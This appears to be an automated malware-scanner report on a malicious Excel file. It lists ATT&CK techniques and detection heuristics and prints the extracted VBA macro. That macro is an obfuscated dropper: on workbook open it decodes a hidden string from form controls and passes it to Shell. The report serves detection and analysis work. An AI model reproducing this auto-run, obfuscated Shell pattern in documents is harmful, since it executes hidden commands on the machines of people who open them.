MALICIOUS (Risk Score: 182)
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The presence of the Shell() call and the Workbook_Open event strongly suggests the macro is designed to download and execute a secondary payload, a common technique for malware delivery. The ClamAV detection further supports its malicious nature.
Heuristics (5)
- ClamAV: Xls.Malware.Generic-6735647-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Generic-6735647-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.day.com/dam/1.0 (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/tiff/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10225 bytes |

SHA-256: e90e3fb26b9bbadd6f895438d2ce4002d14e1c49a159bce4bbe630fe169c9bf0

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
A1 = "890"
a2 = "160000"
chageDoc a2
a = "exit " + a2
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub reports(arg1, ByRef later)
jtask = 1
later = 0
ostr jtask, later, arg1
End Sub
'create module
Sub new_func(ARG2, ByRef minA)
minA = ""
If ARG2 = -1 Then
ARG2 = -1
End If
If ARG2 < 1 Then
task_format_accounting TaskForm1.further, Len(TaskForm1.further) + ARG2, minA
Else
task_format_accounting TaskForm1.further, ARG2, minA
End If
End Sub
Sub task_formulas()
line2 = ""
task_set_validations TaskForm1.wryh, line2
With TaskForm1
.cppc = line2
.TextBox1 = .cppc
End With
End Sub
Sub task_set_validations(SIGUSR2, ByRef should)
should = ""
str2 = 1
task_scrub_cpc str2, should, SIGUSR2
End Sub
Sub task_scrub_cpc(ByRef B1, ByRef ARG2, arg1)
lev = Len(arg1)
If B1 <= lev Then
b2 = ""
task_format_accounting arg1, B1, b2
down2 = 1
reports b2, down2
a = ""
new_func down2 - 2, a
ARG2 = ARG2 + a
B1 = B1 + 1
task_scrub_cpc B1, ARG2, arg1
End If
End Sub
Sub task_format_accounting(check, pointB, ByRef B1)
B1 = Right(Left(check, pointB), 1)
End Sub
Sub chageDoc(have)
TaskForm1.NextData = have
End Sub
Sub ostr(ByRef arg1, ByRef maxA, bolton)
st1 = 1
st1 = Len(TaskForm1.further)
If arg1 < st1 Then
line = ""
task_format_accounting TaskForm1.further, arg1, line
If bolton <> line Then
arg1 = arg1 + 1
ostr arg1, maxA, bolton
Else
maxA = arg1
End If
End If
End Sub
Attribute VB_Name = "TaskForm1"
Attribute VB_Base = "0{243A6F15-33C2-4796-982C-90412157E5FD}{424F2909-5413-4BC5-B550-06C95E1CA291}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub NextData_Change()
task_formulas
End Sub
Private Sub TextBox1_Change()
A1 = 30 * 100
char2 = "1021"
char2 = "22"
char2 = "70"
imin = "54"
imin = "35"
imin = "57"
char2 = "75"
'ers s to str1 hfile
char2 = "52"
char2 = "19"
char2 = "92"
low1 = A1 - 10 * 300
char2 = "41"
char2 = "86"
char2 = TaskForm1.TextBox1
imin = "7"
imin = "36"
If low1 = 0 Then Shell char2, low1
imin = "62"
imin = "10"
imin = "80"
imin = "3"
imin = "28"
imin = "56"
imin = "29"
imin = "33"
char2 = "70"
char2 = "68"
char2 = "60"
char2 = "64"
char2 = "73"
char2 = "51"
char2 = "9"
char2 = "21"
End Sub
Private Sub wryh_Change()
End Sub
' Processing file: /opt/analyzer/scan_staging/e1f562278f884443a57c7b5e561a3290.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1297 bytes
' Line #0:
' FuncDefn (Sub Workbook_Open())
' Line #1:
' LitStr 0x0003 "890"
' St A1
' Li
... (truncated)